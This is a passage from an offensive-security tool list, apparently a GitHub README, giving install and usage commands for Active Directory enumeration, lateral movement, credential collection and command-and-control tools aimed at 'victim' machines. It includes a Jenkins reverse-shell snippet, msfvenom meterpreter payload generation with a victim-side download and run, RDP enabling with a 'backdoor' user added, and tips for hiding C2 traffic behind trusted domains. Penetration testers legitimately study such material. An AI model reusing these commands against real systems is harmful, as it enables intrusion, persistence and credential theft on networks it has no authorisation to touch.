\n\n```python\n./PingCastle.exe\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png)\n\n### [πŸ”™](#tool-list)[Seatbelt](https://github.com/GhostPack/Seatbelt)\n\nSeatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.\n\nIt is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings\n\n**Install: (Compile)** \n\nSeatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/).\n\nOpen up the project .sln, choose \"release\", and build.\n\n**Usage:** \n\n```bash\n# Run all checks and output to output.txt\nSeatbelt.exe -group=all -full \u003e output.txt\n\n# Return 4624 logon events for the last 30 days\nSeatbelt.exe \"LogonEvents 30\"\n\n# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*\nSeatbelt.exe \"reg \\\"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\" 3 .*defini.* true\"\n\n# Run remote-focused checks against a remote system\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\\sam -password=\"yum \\\"po-ta-toes\\\"\"\n```\n\nFull command groups and parameters can be found [here](https://github.com/GhostPack/Seatbelt#command-groups).\n\n![image](https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png)\n\n*Image used from https://exord66.github.io/csharp-in-memory-assemblies*\n\n### [πŸ”™](#tool-list)[ADRecon](https://github.com/sense-of-security/adrecon)\n\nGreat tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.\n\nIt can be run from any workstation that is connected to the environment, even hosts that are not domain members.\n\n[BlackHat USA 2018 SlideDeck](https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation)\n\n**Prerequisites** \n\n- .NET Framework 3.0 or later (Windows 7 includes 3.0)\n- PowerShell 2.0 or later (Windows 7 includes 2.0)\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/sense-of-security/ADRecon.git\n```\n\n**Install: (Download)** \n\nYou can download a zip archive of the [latest release](https://github.com/sense-of-security/ADRecon/archive/master.zip). \n\n**Usage:** \n\n```bash\n# To run ADRecon on a domain member host.\nPS C:\\\u003e .\\ADRecon.ps1\n\n# To run ADRecon on a domain member host as a different user.\nPS C:\\\u003e.\\ADRecon.ps1 -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e\n\n# To run ADRecon on a non-member host using LDAP.\nPS C:\\\u003e.\\ADRecon.ps1 -Protocol LDAP -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e\n\n# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)\nPS C:\\\u003e.\\ADRecon.ps1 -Protocol ADWS -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e -Collect Domain, DomainControllers\n```\n\nFull usage and parameter information can be found [here](https://github.com/sense-of-security/adrecon#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png)\n\n*Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/*\n\n### [πŸ”™](#tool-list)[adidnsdump](https://github.com/dirkjanm/adidnsdump)\n\nBy default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer. \n\nThis tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.\n\n**Install: (Pip)** \n\n```bash\npip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/dirkjanm/adidnsdump\ncd adidnsdump\npip install .\n```\n\n**Note:** *The tool requires `impacket` and `dnspython` to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install [impacket from GitHub](https://github.com/CoreSecurity/impacket).*\n\n**Usage:** \n\n```bash\n# Display the zones in the domain where you are currently in\nadidnsdump -u icorp\\\\testuser --print-zones icorp-dc.internal.corp\n\n# Display all zones in the domain\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp\n\n# Resolve all unknown records (-r)\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp -r\n```\n\n[Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)\n\n![adidnsdump](https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg)\n\n*Image used from https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/*\n\n### [πŸ”™](#tool-list)[kerbrute](https://github.com/ropnop/kerbrute)\n\nA tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.\n\n**Install: (Go)** \n\n```bash\ngo get github.com/ropnop/kerbrute\n```\n\n**Install: (Make)** \n\n```bash\ngit clone https://github.com/ropnop/kerbrute\ncd kerbrute\nmake all\n```\n\n**Usage:** \n\n```bash\n# User Enumeration\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n# Password Spray\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n# Brute User\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman\n\n# Brute Force\n./kerbrute -d lab.ropnop.com bruteforce -\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png)\n\n*Image used from https://matthewomccorkle.github.io/day_032_kerbrute/*\n\n### [πŸ”™](#tool-list)[scavenger](https://github.com/SpiderLabs/scavenger)\n\nScavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as \"interesting\" files containing sensitive information.\n\nScavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.\n\n**Install:** \n\nFirst install CrackMapExec from [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation).\n\n```bash\ngit clone https://github.com/SpiderLabs/scavenger\ncd scavenger\n```\n\n**Usage:** \n\n```bash\n# Search for interesting files on victim endpoint\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\n```\n\nNice [blog post](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/).\n\n![image](https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png)\n\n*Image used from https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/*\n\nLateral Movement\n====================\n\n### [πŸ”™](#tool-list)[crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec)\n\nThis is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.\n\n**Install:** \n\n```bash\nsudo apt install crackmapexec\n```\n\n**Usage:** \n\n```bash\ncrackmapexec smb \u003cip address\u003e -d \u003cdomain\u003e -u \u003cuser list\u003e -p \u003cpassword list\u003e\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png)\n\n### [πŸ”™](#tool-list)[WMIOps](https://github.com/FortyNorthSecurity/WMIOps)\n\nWMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.\n\nDeveloped by [@christruncer](https://twitter.com/christruncer).\n\nOriginal [blog post](https://www.christophertruncer.com/introducing-wmi-ops/) documenting release.\n\n**Install: (PowerShell)** \n\n```bash\ngit clone https://github.com/FortyNorthSecurity/WMIOps\nImport-Module WMIOps.ps1\n```\n\n**Usage:** \n\n```bash\n# Executes a user specified command on the target machine\nInvoke-ExecCommandWMI\n\n# Returns all running processes from the target machine\nGet-RunningProcessesWMI\n\n# Checks if a user is active at the desktop on the target machine (or if away from their machine)\nFind-ActiveUsersWMI\n\n# Lists all local and network connected drives on target system\nGet-SystemDrivesWMI\n\n# Executes a powershell script in memory on the target host via WMI and returns the output\nInvoke-RemoteScriptWithOutput\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png)\n\n![image](https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png)\n\n*Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/*\n\n### [πŸ”™](#tool-list)[PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell)\n\nTool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.\n\n**Install:** \n\n```bash\ngit clone https://github.com/Mr-Un1k0d3r/PowerLessShell\ncd PowerLessShell\n```\n\n**Usage:** \n\n```bash\n# Help\npython PowerLessShell.py -h\n\n# Generate PowerShell payload \npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n# Generating a shellcode payload\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\n```\n\nFull usage information can be found [here](https://github.com/Mr-Un1k0d3r/PowerLessShell#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png)\n\n*Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628*\n\n### [πŸ”™](#tool-list)[PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec)\n\nPsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.\n\nIt is great for remotely executing commands on target machines.\n\n**Note:** Some AVs detect PsExec as a 'remote admin' virus.\n\n**Install: (PowerShell)** \n\n```bash\nInvoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'\nExpand-Archive -Path 'pstools.zip' -DestinationPath \"$env:TEMP\\pstools\"\nMove-Item -Path \"$env:TEMP\\pstools\\psexec.exe\" .\nRemove-Item -Path \"$env:TEMP\\pstools\" -Recurse\n```\n\n**Usage:** \n\n```bash\n# Prevent the license agreement from being displayed\npsexec.exe /accepteula\n\n# Run the 'hostname' command on remote machine\npsexec.exe \\\\REMOTECOMPUTER hostname\n\n# Run the 'hostname' command on EVERYTHING (on the domain)\npsexec.exe \\\\* hostname\n\n# Run a local executable on a remote machine\npsexec.exe \\\\REMOTECOMPUTER -c C:\\Tools\\program.exe\n\n# Run the 'hostname' command with different credentials\npsexec.exe \\\\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word\n\n# Spawn shell on remote machine\npsexec.exe -s \\\\REMOTECOMPUTER cmd\n```\n\nGreat [blog post](https://adamtheautomator.com/psexec/) on PsExec usage.\n\n![image](https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png)\n\n*Image used from https://adamtheautomator.com/psexec/*\n\n### [πŸ”™](#tool-list)[LiquidSnake](https://github.com/RiccardoAncarani/LiquidSnake)\n\nLiquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk. \n\nThe tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.\n\nThe project is composed by two separate solutions:\n\n- `CSharpNamedPipeLoader` - the component that will be transformed in VBS via GadgetToJScript\n- `LiquidSnake` - the component responsible to creating the WMI Event Subscription on the remote system\n\n**Install:** \n\nOpen both solutions in Visual Studio and build. *Make sure to target x64 architecture for the `CSharpNamedPipeLoader`.*\n\nOutput: Two separate EXEs: `CSharpNamedPipeLoader.exe` and `LiquidSnake.exe`\n\nFull build information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#building).\n\n**Usage:** \n\nUse `LiquidSnake.exe` agains a host where you have administrative access over as follows:\n\n```bash\nLiquidSnake.exe \u003chost\u003e [\u003cusername\u003e \u003cpassword\u003e \u003cdomain\u003e]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\n```\n\nIf everything went fine, you should obtain an output similar as the following:\n\n```bash\n[*] Event filter created.\n[*] Event consumer created.\n[*] Subscription created, now sleeping\n[*] Sending some DCOM love..\n[*] Sleeping again... long day\n```\n\nGeneral usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#usage).\n\nFull `LiquidSnake` usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake).\n\n![LiquidSnake](https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg)\n\n*Image used from https://github.com/RiccardoAncarani/LiquidSnake#usage*\n\n### [πŸ”™](#tool-list)Enabling RDP\n\n```shell\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnet localgroup \"Remote Desktop Users\" \"backdoor\" /add\n```\n\n### [πŸ”™](#tool-list)Upgrading shell to meterpreter\n\nShells (https://infinitelogins.com/tag/payloads/)\n\nAfter getting basic shell access to an endpoint a meterpreter is nicer to continue with.\n\n**[attacker]** Generate a meterpreter shell:\n\n```shell\nmsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cIP\u003e LPORT=\u003cPORT\u003e -f elf \u003e shell-x86.elf\n```\n\n![image](https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png)\n\n**[victim]** Download to victim endpoint: \n\n```shell\npowershell \"(New-Object System.Net.WebClient).Downloadfile('http://\u003cip\u003e:8000/shell-name.exe','shell-name.exe')\"`\n```\n\n**[attacker]** Configure listener: \n\n```shell\nuse exploit/multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST your-ip \nset LPORT listening-port run`\n```\n\n**[victim]** Execute payload:\n\n```shell\nStart-Process \"shell-name.exe\"`\n```\n\n![image](https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png)\n\n### [πŸ”™](#tool-list)Forwarding Ports\t\n\nSometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host.\n\n```bash\nsocat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u0026\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u0026\n```\n\n### [πŸ”™](#tool-list)Jenkins reverse shell\n\nIf you gain access to a jenkins script console you can use this to gain a reverse shell on the node.\n\n```jenkins\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/IP_ADDRESS/PORT;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n```\n\n### [πŸ”™](#tool-list)[ADFSpoof](https://github.com/mandiant/ADFSpoof)\n\nCreated by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.\n\nADFSpoof has two main functions:\n\n1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.\n2. Given a signing key, produce a signed security token that can be used to access a federated application.\n\nThis tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.\n\n**Install:** \n\n**Note:** *ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available [here](https://github.com/dmb2168/cryptography).*\n\n```bash\ngit clone https://github.com/mandiant/ADFSpoof\npip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n# Decrypt the EncryptedPFX and write to disk\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n# Generate a security token for Office365\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759\n```\n\nFull usage information can be found [here](https://github.com/mandiant/ADFSpoof#usage).\n\nAdditional command examples can be found [here](https://github.com/mandiant/ADFSpoof#examples).\n\n![image](https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png)\n\n*Image used from https://github.com/mandiant/ADFSpoof#usage*\n\n### [πŸ”™](#tool-list)[Coercer](https://github.com/p0dalirius/Coercer)\n\nA python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.\n\nFeatures:\n\n- Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)\n- Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)\n- Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.\n- Random UNC paths generation to avoid caching failed attempts (all modes)\n- Configurable delay between attempts with --delay\n\nMore feature information [here](https://github.com/p0dalirius/Coercer#features).\n\n**Install: (pip)** \n\n```bash\nsudo python3 -m pip install coercer\n```\n\n**Usage:** \n\n```bash\n# Scan mode (Assess the Remote Procedure Calls listening on a machine)\n./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)\n./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)\n./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n```\n\n![image](https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png)\n\n*Image used from https://github.com/p0dalirius/Coercer#quick-start*\n\nCollection\n====================\n\n### [πŸ”™](#tool-list)[BloodHound](https://github.com/BloodHoundAD/BloodHound)\n\nAn application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.\n\n**Install:** [PenTestPartners Walkthrough](https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/)\n\n**Custom Queries:** [CompassSecurity BloodHoundQueries](https://github.com/CompassSecurity/BloodHoundQueries) \n\n![image](https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png)\n\n### [πŸ”™](#tool-list)[Snaffler](https://github.com/SnaffCon/Snaffler)\n\nSnaffler is an advanced credential scanner/collector for Active Directory environments. *With a great [README](https://github.com/SnaffCon/Snaffler/blob/master/README.md)*.\n\nSnaffler uses a system of \"classifiers\", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.\n\n*More information about Snaffler [rules](https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset).*\n\n'*Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.*' - Snaffler README (2023)\n\n**Install:** \n\nYou can download the binary from the [GitHub Releases Page](https://github.com/SnaffCon/Snaffler/releases).\n\n**Usage:** \n\n```bash\n# Targeted local scan (less likely to trigger detections)\nSnaffler.exe -s -i C:\\\n\n# Go in loud and find everything\nsnaffler.exe -s -o snaffler.log\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png)\n\n*Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like*\n\n### [πŸ”™](#tool-list)[linWinPwn](https://github.com/lefayjey/linWinPwn)\n\nlinWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. \n\nThe script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.\n\nlinWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.\n\n**Install:** \n\n```bash\ngit clone https://github.com/lefayjey/linWinPwn\ncd linWinPwn; chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\n```\n\n**Usage:** \n\n```bash\n# Default: interactive - Open interactive menu to run checks separately\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e [-d \u003cAD_domain\u003e -u \u003cAD_user\u003e -p \u003cAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003e -o \u003coutput_dir\u003e]\n\n# Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e --auto-config\n\n# LDAPS - Use LDAPS instead of LDAP (port 636)\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e --ldaps\n\n# Module pwd_dump: Password Dump\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e -M pwd_dump [-d \u003cAD_domain\u003e -u \u003cAD_user\u003e -p \u003cAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003e -o \u003coutput_dir\u003e]\n```\n\nFull usage information [here](https://github.com/lefayjey/linWinPwn#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png)\n\n*Image used from https://github.com/lefayjey/linWinPwn#demos*\n\nCommand and Control\n====================\n\n### [πŸ”™](#tool-list)[Living Off Trusted Sites Project](https://lots-project.com/)\n\nC2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains.\n\nBeing able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions.\n\nThis resource contains a list of trusted sites that can be used. \n\n**Usage:** \n\nVisit [https://lots-project.com/](https://lots-project.com/)\n\nSearch for `+C\u0026C` in the search bar to view all potential domains / subdomains that can be used for command and control operations.\n\nResults include:\n\n- raw.githubusercontent.com\n- docs.google.com\n- *.azurewebsites.net\n- dropbox.com\n- *.amazonaws.com\n\n![image](https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png)\n\n*Image used from https://lots-project.com/*\n\n### [πŸ”™](#tool-list)[Havoc](https://github.com/HavocFramework/Havoc)\n\nHavoc is a modern and malleable post-exploitation command and control framework, created by [@C5pider](https://twitter.com/C5pider).\n\nFeatures include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs\n\n**Pre-requisites:** (Ubuntu 20.04 / 22.04)\n\n```bash\nsudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\n```\n\n**Build + Usage:**\n\n```bash\ngit clone https://github.com/HavocFramework/Havoc.git\ncd Havoc/Client\nmake \n./Havoc \n```\n\n**Pre-requisites:** (Ubuntu 20.04 / 22.04)\n\n```bash\ncd Havoc/Teamserver\ngo mod download golang.org/x/sys \ngo mod download github.com/ugorji/go\n```\n\n**Build + Usage:**\n\n```bash\ncd Teamserver\n./Install.sh\nmake\n./teamserver -h\n```\n\n**Run the teamserver**\n\n```bash\nsudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\n```\n\n*Full install, build and run instructions on the [wiki](https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD)*\n\n![image](https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png)\n\n### [πŸ”™](#tool-list)[Covenant](https://github.com/cobbr/Covenant)\n\nCovenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.\n\nIt can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.\n\n**Install: (Dotnet Core)** \n\nYou can download dotnet core for your platform from [here](https://dotnet.microsoft.com/download/dotnet-core/3.1).\n\n**Note:** *After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user*\n\n```bash\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n```\n\n**Usage: (Dotnet Core)** \n\n```bash\n~/Covenant/Covenant \u003e dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started! Navigate to https://127.0.0.1:7443 in a browser\n```\n\n**Install: (Docker)**\n\n```bash\n# Build the docker image:\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n~/Covenant/Covenant \u003e docker build -t covenant .\n```\n\n**Usage: (Docker)** \n\n```bash\n# Run Covenant within the Docker container\n~/Covenant/Covenant \u003e docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u003c/absolute/path/to/Covenant/Covenant/Data\u003e:/app/Data covenant\n\n# Stop the container\n~/Covenant/Covenant \u003e docker stop covenant\n\n# Restart Covenant interactively\n~/Covenant/Covenant \u003e docker start covenant -ai\n```\n\nFull installation and startup instructions can be found on the wiki [here](https://github.com/cobbr/Covenant/wiki/Installation-And-Startup).\n\n![image](https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png)\n\n*Image from https://github.com/cobbr/Covenant*\n\n### [πŸ”™](#tool-list)[Merlin](https://github.com/Ne0nd0g/merlin)\n\nMerlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system.\n\nIt is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.\n\n**Install:** \n\n1. Download the latest compiled version of Merlin Server from the [releases](https://github.com/Ne0nd0g/merlin/releases) section\n2. Extract the files with 7zip using the x function The password is: merlin\n3. Start Merlin\n4. Configure a [listener](https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html)\n5. Deploy an agent. See [Agent Execution Quick Start Guide](https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html) for examples\n\n```bash\nmkdir /opt/merlin;cd /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z\nsudo ./merlinServer-Linux-x64\n```\n\n**Usage:** \n\n1. Ensure the Merlin server is running with a configured listener\n2. Download and deploy an agent to the victim\n3. Execute agent\n\nFor detailed usage information see the official Merlin [wiki](https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html).\n\n![image](https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png)\n\n*Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks*\n\n### [πŸ”™](#tool-list)[Metasploit Framework](https://github.com/rapid7/metasploit-framework)\n\nMetasploit is an open-source framework for developing, testing, and using exploit code.\n\nThe Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.\n\n**Install: (Installer)** \n\n```bash\ncurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u003e msfinstall \u0026\u0026 \\\n chmod 755 msfinstall \u0026\u0026 \\\n ./msfinstall\n```\n\n**Usage:** \n\n```bash\n/opt/metasploit-framework/bin/msfconsole\n```\n\nFull installation instructions can be found on the official [wiki](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html).\n\n[Rapid7 Metasploit blogs](https://www.rapid7.com/blog/tag/metasploit/)\n\n[Cheat sheet graphic](https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp)\n\n[Nice command list](https://github.com/security-cheatsheet/metasploit-cheat-sheet)\n\n![image](https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png)\n\n*Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/*\n\n### [πŸ”™](#tool-list)[Pupy](https://github.com/n1nj4sec/pupy)\n\nPupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.\n\nIt allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.\n\n**Install: (Git)** \n\n```bash\nsudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\ncd pupy\npython create-workspace.py -DG pupyw\n```\n\nRoll fix to fix the error:\n\n```bash\nsudo pip2 install rpyc==3.4.4\n```\n\nStart:\n\n```bash\nexport PATH=$PATH:~/.local/bin; pupysh\npupyws/bin/pupysh\n```\n\n*Git install instructions used from [here](https://kalitut.com/how-to-install-pupy/).*\n\n**Install: (Docker)** \n\nFor detailed docker and pupy installation instructions see the [wiki](https://github.com/n1nj4sec/pupy/wiki/Installation).\n\n**Usage:** \n\n```bash\n# Get help page for any builtin commands with -h\n\u003e\u003e sessions -h\n\u003e\u003e jobs -h\n\u003e\u003e run -h\n\n# Interact with session 1\n\u003e\u003e sessions -i 1\n\n# Run local command 'ls'\n\u003e\u003e !ls\n```\n\nFull usage information can be found on the [wiki](https://github.com/n1nj4sec/pupy/wiki/Basic-Usage).\n\nThe wiki contains good [post exploitation 